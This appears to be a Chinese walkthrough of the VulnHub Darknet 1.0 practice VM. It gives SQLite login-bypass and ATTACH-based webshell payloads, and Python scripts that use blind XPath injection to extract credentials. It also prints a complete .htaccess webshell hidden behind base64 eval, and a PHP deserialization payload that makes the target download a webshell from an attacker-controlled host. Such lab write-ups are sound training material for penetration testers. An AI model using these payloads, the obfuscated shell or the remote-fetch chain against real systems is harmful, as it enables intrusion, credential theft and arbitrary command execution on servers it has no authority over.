VulnHub Darknet：1.0

Darknet: 1.0

项目地址：https://download.vulnhub.com/darknet/Darknet.rar

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

敏感信息泄露

Apache 虚拟主机配置文件

扫描目录发现一个文件

文件内容如下

<VirtualHost *:80>
    ServerName 888.darknet.com
    ServerAdmin devnull@darknet.com
    DocumentRoot /home/devnull/public_html
    ErrorLog /home/devnull/logs
</VirtualHost>

这是一个 Apache 虚拟主机配置文件

• 域名：888.darknet.com
• 管理员邮箱：devnull@darknet.com
• 网站根目录：/home/devnull/public_html
• 错误日志路径：/home/devnull/logs
• 用户名：devnull

.htaccess 是 Apache 服务器中用于目录级别配置的文件，通常用来控制访问权限、重写 URL 等

尝试修改 hosts 文件将 888.darknet.com 指向目标 IP

vim /etc/hosts

添加内容为

192.168.1.100   888.darknet.com

之后访问该域名即可看到登录框

SQL 注入

Darknet（万能密码）

使用 SQLMap 没有跑出来，尝试手动注入

unrecognized token 是 SQLite 数据库非常典型的错误描述

尝试万能密码

devnull' or '1

构造的语句

SELECT * FROM users WHERE user='devnull' or '1' and pass='[MD5_HASH]'

万能密码登录成功

RCE

SQLite

这里需要了解 SQLite 注入怎么 RCE，首先得知道路径

再结合上面的信息泄露可得出

/home/devnull/public_html/img/
/home/devnull/public_html/css/
/home/devnull/public_html/includes/

首先，通过注入点执行 ATTACH 命令

这会在服务器磁盘上创建一个名为 shell.php 的新数据库文件

ATTACH DATABASE '/home/devnull/public_html/img/phpinfo.php' as pwn;

在刚刚附加的 pwn 库中创建一个字段，用于承载我们的木马代码

CREATE TABLE pwn.shell (code TEXT);

将 PHP 代码插入到表中

INSERT INTO pwn.shell (code) VALUES ('<?php phpinfo(); ?>');

发现禁用了大多数命令执行函数

尝试绕过

ATTACH DATABASE '/home/devnull/public_html/img/files.php' as pwn;
CREATE TABLE pwn.shell (code TEXT);
    INSERT INTO pwn.shell (code) VALUES ("<?php if($_GET['a'] == 'ls') { print_r(scandir($_GET['p'])); } if($_GET['a'] == 'cat') { print_r(readfile($_GET['p'])); } ?>");

找到了另一个 VirtualHost 配置文件/etc/apache2/sites-available/

<VirtualHost *:80>
    ServerName signal8.darknet.com
    ServerAdmin errorlevel@darknet.com
    DocumentRoot /home/errorlevel/public_html

    <Directory /home/errorlevel/public_html>
        Options -Indexes +FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>

    ErrorLog /var/log/apache2/signal8_error.log
    CustomLog /var/log/apache2/signal8_access.log combined
</VirtualHost>

Xpath 注入

Contacto

重新修改 /etc/hosts 访问

点击图片中的链接跳转到了新的页面，同时 URL 中多了一个参数 id

但是测试 SQL 注入并不存在，于是开始 FUZZ

发现该有效载荷 count(/child::node()) 成功地为该参数返回了有效结果id

count(/child::node()) 是标准的 XPath 1.0 语法，用于计算当前 XML 文档根节点下子节点的数量

注入点探测

构造真命题 id=1 and 1=1 确认能否布尔盲注

爆破节点

我们不知道 XML 的结构，所以必须利用 name() 和位置函数来让服务器“自报家门”

我们通过 starts-with(name(.), 'a')、starts-with(name(.), 'ab') 不断累加字符

只要页面返回了 errorlevel@darknet.com，就说明我们的猜解是正确的

import requests
import string
import sys

# 配置实战参数
ENTRY_POINT = 'http://signal8.darknet.com/contact.php'
# 成功的标志：页面出现了该邮箱
SUCCESS_FLAG = 'errorlevel@darknet.com'

def write_out(char):
    sys.stdout.write(char)
    sys.stdout.flush()

def exfiltrate_node_name(payload_template):
    """
    通用猜解函数
    payload_template: 例如 "1 and starts-with(name(.),'{exfil}')"
    """
    exfil = ''
    while True:
        found_char = False
        # 遍历可打印字符（重点关注字母和数字）
        for char in string.ascii_letters + string.digits:
            test_payload = payload_template.format(exfil=exfil + char)
            try:
                r = requests.get(ENTRY_POINT, params={'id': test_payload}, timeout=5)
                if SUCCESS_FLAG in r.text:
                    exfil += char
                    write_out(char)
                    found_char = True
                    break
            except Exception as e:
                continue
        
        if not found_char:
            break
    return exfil

# --- 实战探测开始 ---

print("[*] 正在探测当前节点名称 (name(.)): ")
# 这里的 name(.) 是指当前 XPath 查询定位到的那个节点
current_node = exfiltrate_node_name("1 and starts-with(name(.),'{exfil}')")

print("\n[*] 正在探测父节点名称 (name(..)): ")
# 这里的 name(..) 向上跳一级，帮助我们理解结构
parent_node = exfiltrate_node_name("1 and starts-with(name(..),'{exfil}')")

print(f"\n\n[!] 结构还原完成: //{parent_node}/{current_node}")

爆破字段属性

当路径被锁定为 //auth/user 时，接下来的任务是找到除了 email 之外的“价值字段”

import requests

ENTRY_POINT = 'http://signal8.darknet.com/contact.php'
SUCCESS_FLAG = 'errorlevel@darknet.com'

# 常用敏感字段字典（包含常见的英语和西班牙语关键词）
# 因为我们之前分析过目标可能有西班牙语背景，所以加入 clave
WORDLIST = [
    'username', 'user', 'login', 'name', 
    'password', 'pass', 'clave', 'pwd', 'secret',
    'id', 'role', 'admin', 'token'
]

def find_attributes():
    print(f"[*] 开始爆破 //auth/user[1] 下的字段名...")
    found_attributes = []
    
    for word in WORDLIST:
        # 构造检测 Payload：探测当前 user 节点下是否存在名为 {word} 的子节点
        payload = f"1 and count(//auth/user[1]/{word})>0"
        try:
            r = requests.get(ENTRY_POINT, params={'id': payload})
            if SUCCESS_FLAG in r.text:
                print(f"[+] 发现有效字段: {word}")
                found_attributes.append(word)
        except Exception:
            continue
            
    return found_attributes

if __name__ == "__main__":
    attributes = find_attributes()
    print(f"\n[!] 探测完成。当前 user 节点包含字段: {', '.join(attributes)}")

爆破字段值

现在的障碍只剩下最后一道防线：提取它们的具体值（id 只是数字，所以排除）

import requests
import string
import sys

ENTRY_POINT = 'http://signal8.darknet.com/contact.php'
SUCCESS_FLAG = 'errorlevel@darknet.com'

# 定义我们要拖取的字段
TARGET_FIELDS = ['username', 'clave']

def write_out(char):
    sys.stdout.write(char)
    sys.stdout.flush()

def extract_field_value(field_name):
    """
    针对具体字段进行逐字符提取
    """
    print(f"[*] 正在提取字段 [{field_name}] 的内容: ", end='')
    value = ''
    # 扩展字符集，密码可能包含特殊符号
    charset = string.ascii_letters + string.digits + "!@#$%^&*()_+=-"
    
    while True:
        found_char = False
        for char in charset:
            # 构造 Payload：1 and starts-with(//auth/user[id=1]/字段名, '当前进度+猜测字符')
            # 这里的 id=1 是我们定位目标用户的关键索引
            payload = f"1 and starts-with(//auth/user[id=1]/{field_name}, '{value + char}')"
            
            try:
                r = requests.get(ENTRY_POINT, params={'id': payload}, timeout=5)
                if SUCCESS_FLAG in r.text:
                    value += char
                    write_out(char)
                    found_char = True
                    break
            except Exception:
                continue
        
        if not found_char:
            break
    print(" [Done]")
    return value

# --- 开启最终收割模式 ---

print("="*50)
print("XPath 注入最终数据提取阶段")
print("="*50)

results = {}
for field in TARGET_FIELDS:
    results[field] = extract_field_value(field)

print("\n" + "="*50)
print("成功获取登录凭据：")
print(f"Username: {results['username']}")
print(f"Password: {results['clave']}")
print("="*50)

弱口令

Secure Login

访问 robots.txt 文件拿到一个敏感路径

是一个登录框

成功进入后台，但是 Editor PHP 功能没用

文件上传

.htaccess

查看页面源代码发现有个注释文件

访问来到文件上传点

很快我就发现，必须选中正确的复选框组合才能上传任何内容

每个复选框都有一个数值，所以我把这些数值复制到一个脚本中，然后尝试所有可能的组合

如果响应中没有出现西班牙语 “Key incorrecta!” ，我就知道这个组合是正确的

经过一些手动调整，我还发现密钥由 4 个整数组成

尝试使用多于或少于 4 个密钥的组合会导致 HTTP 响应出现 “ La longitud de la clave no es la correcta!”

最后爆破出来是

37, 10, 59, 17

因为在前面有泄露过 Apache 配置信息

<VirtualHost *:80>
    ServerName signal8.darknet.com
    ServerAdmin errorlevel@darknet.com
    DocumentRoot /home/errorlevel/public_html

    <Directory /home/errorlevel/public_html>
        Options -Indexes +FollowSymLinks
        AllowOverride All
        Require all granted
    </Directory>

    ErrorLog /var/log/apache2/signal8_error.log
    CustomLog /var/log/apache2/signal8_access.log combined
</VirtualHost>

编写含有木马的 .htaccess 文件

参考 PHP 大码：https://gist.github.com/leonjza/8e9d16c84cf70014c4f36d8f95f9836e

运行下面的脚本

python pack.py shell.php

下面这段配置的作用是：允许通过 Web 访问文件名以 .ht 开头的文件（如 .htaccess）

<Files ~ "^\.ht">
    Order allow,deny
    Allow from all
</Files>

这行告诉 Apache，将扩展名为 .htaccess 的文件交给 PHP 解析器处理

AddType application/x-httpd-php .htaccess

完整脚本如下

# <!--  Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### --><?php eval(base64_decode("QCRhY3Rpb24gPSAkX1JFUVVFU1RbJ2FjdGlvbiddO0AkcGF0aCA9ICRfUkVRVUVTVFsncGF0aCddO2Z1bmN0aW9uIGZpbGVfcnd4KCRmaWxlKXsgJHBlcm1zID0gc3Vic3RyKHNwcmludGYoJyVvJywgZmlsZXBlcm1zKCRmaWxlKSksIC00KTsgJHJ3eCA9IFsnLS0tJywgJy0teCcsICctdy0nLCAnLXd4JywgJ3ItLScsICdyLXgnLCAncnctJywgJ3J3eCddOyAkdHlwZSA9IGlzX2RpcigkZmlsZSkgPyAnZCcgOiAnLSc7ICRvd25lciA9ICRwZXJtc1sxXTsgJGdyb3VwID0gJHBlcm1zWzJdOyAkcHVibGljID0gJHBlcm1zWzNdOyByZXR1cm4gJHR5cGUgLiAkcnd4WyRvd25lcl0gLiAkcnd4WyRncm91cF0gLiAkcnd4WyRwdWJsaWNdIC4gJyAnIC4gcG9zaXhfZ2V0cHd1aWQoZmlsZW93bmVyKCRmaWxlKSlbJ25hbWUnXTt9ZnVuY3Rpb24gbWVudSgpeyBwcmludCAnPHByZT4nIC4gZ2V0X2N1cnJlbnRfdXNlcigpIC4gJyBAICcgLiBwaHBfdW5hbWUoKSAuIFBIUF9FT0wgLiAnKG1lbnUpIDxhIGhyZWY9JyAuICRfU0VSVkVSWydQSFBfU0VMRiddIC4gJz9hY3Rpb249bHMmcGF0aD0vPmxzPC9hPiB8JyAuICcgPGEgaHJlZj0nIC4gJF9TRVJWRVJbJ1BIUF9TRUxGJ10gLiAnP2FjdGlvbj1jYXQmcGF0aD0vZXRjL3Bhc3N3ZD5jYXQ8L2E+IHwnIC4gJyA8YSBocmVmPScgLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/YWN0aW9uPXVwbG9hZD51cGxvYWQ8L2E+IHwnIC4gJyA8YSBocmVmPScgLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/YWN0aW9uPXBocGluZm8+cGhwaW5mbzwvYT4gfCcgLiAnIDxhIGhyZWY9JyAuICRfU0VSVkVSWydQSFBfU0VMRiddIC4gJz9hY3Rpb249aW5mbz5pbmZvPC9hPiB8JyAuICcgPGEgaHJlZj0nIC4gJF9TRVJWRVJbJ1BIUF9TRUxGJ10gLiAnP2FjdGlvbj1ldmFsJnNyYz1wcmludCtwaHBfdW5hbWUlMjglMjklM0I+ZXZhbDwvYT4gfCcgLiAnIDxhIGhyZWY9JyAuICRfU0VSVkVSWydQSFBfU0VMRiddIC4gJz9hY3Rpb249ZXhlYyZjbWQ9aWQ+ZXhlYzwvYT4nIC4gJzwvcHJlPic7fXN3aXRjaCAoJGFjdGlvbikgeyBjYXNlICdscyc6ICRwYXRoID0gJF9HRVRbJ3BhdGgnXTsgJGZpbGVzID0gYXJyYXlfZGlmZihzY2FuZGlyKCRwYXRoKSwgWycuJywgJy4uJ10pOyBtZW51KCk7IGZvcmVhY2ggKCRmaWxlcyBhcyAkZmlsZSkgeyAkbG9jYXRpb24gPSAkcGF0aCAuICRmaWxlOyBpZiAoaXNfZGlyKCRsb2NhdGlvbikpIHsgJHVybF9hY3Rpb24gPSAnbHMnOyAkbG9jYXRpb24gPSBydHJpbSgkbG9jYXRpb24sICcvJykgLiAnLyc7IH0gZWxzZSB7ICR1cmxfYWN0aW9uID0gJ2NhdCc7IH0gJHdyaXRhYmxlID0gaXNfd3JpdGFibGUoJGxvY2F0aW9uKSA/ICdncmVlbicgOiAncmVkJzsgJHJlYWRhYmxlID0gaXNfcmVhZGFibGUoJGxvY2F0aW9uKSA/ICdncmVlbicgOiAncmVkJzsgaWYgKCRyZWFkYWJsZSA9PSAnZ3JlZW4nIGFuZCAhaXNfZGlyKCRsb2NhdGlvbikpICRkb3dubG9hZCA9ICc8YSBocmVmPScgLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/YWN0aW9uPWRvd25sb2FkJnBhdGg9JyAuIHVybGVuY29kZSgkbG9jYXRpb24pIC4gJz5Eb3dubG9hZDwvYT48L3NwYW4+JzsgZWxzZSAkZG93bmxvYWQgPSAnRG93bmxvYWQnOyBwcmludCAnPHByZT4nOyBwcmludCAnPHNwYW4gc3R5bGU9XCdjb2xvcjonIC4gJHdyaXRhYmxlIC4gJ1wnPldyaXRlPC9zcGFuPiAnIC4gJzxzcGFuIHN0eWxlPVwnY29sb3I6JyAuICRyZWFkYWJsZSAuICdcJz5SZWFkPC9zcGFuPiB8ICcgLiAkZG93bmxvYWQgLiAnIHwgJyAuIGZpbGVfcnd4KCRsb2NhdGlvbikgLiAnIHwgJyAuIGRhdGUoJ00gZCBZIEg6aTpzJywgZmlsZWN0aW1lKCRsb2NhdGlvbikpIC4gJyA8YSBocmVmPScgLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/YWN0aW9uPScgLiAkdXJsX2FjdGlvbiAuICcmcGF0aD0nIC4gdXJsZW5jb2RlKCRsb2NhdGlvbikgLiAnPicgLiAkbG9jYXRpb24gLiAnPC9hPic7IHByaW50ICc8L3ByZT4nOyB9IHJldHVybjsgY2FzZSAnY2F0JzogJGZpbGUgPSBmaWxlX2dldF9jb250ZW50cygkcGF0aCk7IG1lbnUoKTsgcHJpbnQgJzxwcmU+JyAuICRmaWxlIC4gJzwvcHJlPic7IHJldHVybjsgY2FzZSAndXBsb2FkJzogQCRmaWxlID0gJF9GSUxFU1snZmlsZSddOyAkbWVzc2FnZSA9IG51bGw7IGlmICgkZmlsZSkgeyBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVbJ3RtcF9uYW1lJ10sICRwYXRoKTsgJG1lc3NhZ2UgPSAnVXBsb2FkZWQgZmlsZSB0bzogPGEgaHJlZj0nIC4gJF9TRVJWRVJbJ1BIUF9TRUxGJ10gLiAnP2FjdGlvbj0nIC4gJ2NhdCZwYXRoPScgLiB1cmxlbmNvZGUoJHBhdGgpIC4gJz4nIC4gJHBhdGggLiAnPC9hPic7IH0gbWVudSgpOyBwcmludCAnPGZvcm0gYWN0aW9uPSInIC4gJF9TRVJWRVJbJ1BIUF9TRUxGJ10gLiAnP2FjdGlvbj11cGxvYWQiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICcgLiAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPicgLiAnRnVsbCBEZXN0aW5hdGlvbiBQYXRoICYgRmlsZTogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBhdGgiPicgLiAnPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IHByaW50ICRtZXNzYWdlOyByZXR1cm47IGNhc2UgJ2Rvd25sb2FkJzogaGVhZGVyKCdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbScpOyBoZWFkZXIoJ0NvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IEJpbmFyeScpOyBoZWFkZXIoJ0NvbnRlbnQtZGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSInIC4gYmFzZW5hbWUoJHBhdGgpIC4gJyInKTsgZWNobyByZWFkZmlsZSgkcGF0aCk7IHJldHVybjsgY2FzZSAncGhwaW5mbyc6IG1lbnUoKTsgcGhwaW5mbygpOyByZXR1cm47IGNhc2UgJ2luZm8nOiBtZW51KCk7IHByaW50ICc8cHJlPic7IHByaW50ICdFbnZpcm9ubWVudCcgLiBQSFBfRU9MOyBwcmludCAnQ3VycmVudCBVc2VyOiAnIC4gZ2V0X2N1cnJlbnRfdXNlcigpIC4gUEhQX0VPTDsgcHJpbnQgJ1BIUCBWZXJzaW9uOiAnIC4gcGhwdmVyc2lvbigpIC4gUEhQX0VPTDsgcHJpbnQgJ0xvYWRlZCBDb25maWc6ICcgLiBwaHBfaW5pX2xvYWRlZF9maWxlKCkgLiBQSFBfRU9MOyBwcmludCAnUEhQIFNBUEk6ICcgLiBwaHBfc2FwaV9uYW1lKCkgLiBQSFBfRU9MOyBwcmludCAnVW5hbWU6ICcgLiBwaHBfdW5hbWUoKSAuIFBIUF9FT0w7IHByaW50ICcnIC4gUEhQX0VPTDsgcHJpbnQgJ0NvbmZpZ3VyYXRpb24nIC4gUEhQX0VPTDsgcHJpbnQgJ09wZW4gQmFzZWRpcjogJyAuIGluaV9nZXQoJ29wZW5fYmFzZWRpcicpIC4gUEhQX0VPTDsgcHJpbnQgJ0Rpc2FibGUgQ2xhc3NlczogJyAuIGluaV9nZXQoJ2Rpc2FibGVfY2xhc3NlcycpIC4gUEhQX0VPTDsgcHJpbnQgJ0Rpc2FibGUgRnVuY3Rpb25zOiAnIC4gaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKSAuIFBIUF9FT0w7IHByaW50ICdVUkwgZm9wZW46ICcgLiBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSAuIFBIUF9FT0w7IHByaW50ICdVUkwgSW5jbHVkZTogJyAuIGluaV9nZXQoJ2FsbG93X3VybF9pbmNsdWRlJykgLiBQSFBfRU9MOyBwcmludCAnRmlsZSBVcGxvYWRzOiAnIC4gaW5pX2dldCgnZmlsZV91cGxvYWRzJykgLiBQSFBfRU9MOyBwcmludCAnPC9wcmU+JzsgcmV0dXJuOyBjYXNlICdldmFsJzogQCRzcmMgPSAkX1JFUVVFU1RbJ3NyYyddOyBtZW51KCk7IHByaW50ICc8Zm9ybSBhY3Rpb249IicgLiAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/YWN0aW9uPWV2YWwiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICcgLiAnUEhQIENvZGU6IDxicj48dGV4dGFyZWEgbmFtZT0ic3JjIiByb3dzPSIxMCIgY29scz0iNzAiPicgLiAkc3JjIC4gJzwvdGV4dGFyZWE+PGJyPicgLiAnPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV2YWx1YXRlIFBIUCI+PC9mb3JtPic7IGlmICghZW1wdHkoJHNyYykpIHsgcHJpbnQgJzxwcmU+RXZhbCBPdXRwdXQ6PGJyPic7IGV2YWwoJHNyYyk7IHByaW50ICc8L3ByZT4nOyB9IHJldHVybjsgY2FzZSAnZXhlYyc6IEAkY21kID0gJF9SRVFVRVNUWydjbWQnXTsgbWVudSgpOyBwcmludCAnPGZvcm0gYWN0aW9uPSInIC4gJF9TRVJWRVJbJ1BIUF9TRUxGJ10gLiAnP2FjdGlvbj1leGVjIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPiAnIC4gJ1N5c3RlbSBDb21tYW5kOiA8YnI+PHRleHRhcmVhIG5hbWU9ImNtZCIgcm93cz0iMTAiIGNvbHM9IjcwIj4nIC4gJGNtZCAuICc8L3RleHRhcmVhPjxicj4nIC4gJzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJSdW4iPjwvZm9ybT4nOyBpZiAoIWVtcHR5KCRjbWQpKSB7IHByaW50ICc8cHJlPkNvbW1hbmQgT3V0cHV0Ojxicj4nOyBpZiAoY2xhc3NfZXhpc3RzKCdSZWZsZWN0aW9uRnVuY3Rpb24nKSkgeyAkZnVuY3Rpb24gPSBuZXcgUmVmbGVjdGlvbkZ1bmN0aW9uKCdzeXN0ZW0nKTsgJGZ1bmN0aW9uLT5pbnZva2UoJGNtZCk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJ2NhbGxfdXNlcl9mdW5jX2FycmF5JykpIHsgY2FsbF91c2VyX2Z1bmNfYXJyYXkoJ3N5c3RlbScsIFskY21kXSk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJ2NhbGxfdXNlcl9mdW5jJykpIHsgY2FsbF91c2VyX2Z1bmMoJ3N5c3RlbScsICRjbWQpOyB9IGVsc2UgeyBzeXN0ZW0oJGNtZCk7IH0gcHJpbnQgJzwvcHJlPic7IH0gcmV0dXJuOyBkZWZhdWx0OiBtZW51KCk7IHJldHVybjt9"));

提权

/etc/suphp.conf 配置不当

进入 /var/www 目录下发现所有文件夹运行都是 root

下载 sec.php 文件，观察代码应该是要查看反序列化

<?php

require "Classes/Test.php";
require "Classes/Show.php";

if(!empty($_POST['test'])){
    $d=$_POST['test'];
    $j=unserialize($d);
    echo $j;
}
?>

去看看包含的两个文件

<?php

class Test {

    public $url;
    public $name_file;
    public $path;

    function __destruct(){
        $data=file_get_contents($this->url);
        $f=fopen($this->path."/".$this->name_file, "w");
        fwrite($f, $data);
        fclose($f);
        chmod($this->path."/".$this->name_file, 0644);
}
}

?>

• __destruct() 在对象被销毁时自动调用（例如脚本执行结束）
• 它会从 $url 读取内容，然后写入 $path/$name_file，并设置权限为 0644
• 如果攻击者能控制这三个属性，就可以从自己的服务器下载恶意脚本并保存到目标目录

<?php

class Show {

    public $woot;

    function __toString(){
        return "Showme";        

}
    function Pwnme(){
        $this->woot="ROOT";

}

}

?>

• __toString() 在对象被当作字符串使用时调用（比如 echo $obj）
• 这里它只是返回固定的 "Showme"，暂时没有直接危害，但可以用来测试漏洞是否可用

先测试一下是否可用

编写脚本测试

import requests
OBJECT = """O:4:"Show":1:{s:4:"woot";N;}"""
r = requests.post('http://192.168.125.6/sec.php', data={'test': OBJECT})
print(r.text)

排查错误发现 /etc/suphp/suphp.conf 文件可写

suPHP 是一个用于以文件所有者权限执行 PHP 的模块，它的配置文件中：

; Minimum UID
min_uid=100
; Minimum GID
min_gid=100

这意味着 PHP 脚本的所有者 UID 必须 ≥100 才能被执行。而 sec.php 的所有者是 root（UID=0），因此 suPHP 拒绝执行它，导致 500 错误

所以我们需要将其修改为 0，然后重新上传覆盖

反序列化

目标：触发 Test::__destruct()，从攻击者服务器下载 webshell 并保存到 /var/www/pop.php

如果只序列化一个 Test 对象，反序列化后 $j 就是该对象。执行 echo $j 时，由于 Test 类没有 __toString()，PHP 会抛出致命错误（对象不能转换为字符串），导致脚本提前终止

解决方案：将 Test 对象和一个 Show 对象放在同一个数组中序列化

$payload = serialize([$test, new Show()]);

反序列化后 $j 是一个数组，echo $j 只会输出 "Array"（并产生一个 Notice），而不会尝试将数组中的每个元素转为字符串

因此脚本可以顺利执行到结束，从而触发 Test 对象的 __destruct()

设置属性

$test = new Test();
$test->url = 'http://攻击者IP:8000/shell.txt';
$test->name_file = 'pop.php';
$test->path = '/var/www';

最后反序列化

a:2:{i:0;O:4:"Test":3:{s:3:"url";s:35:"http://192.168.252.1:8000/shell.txt";s:9:"name_file";s:7:"pop.php";s:4:"path";s:8:"/var/www";}i:1;O:4:"Show":1:{s:4:"woot";N;}}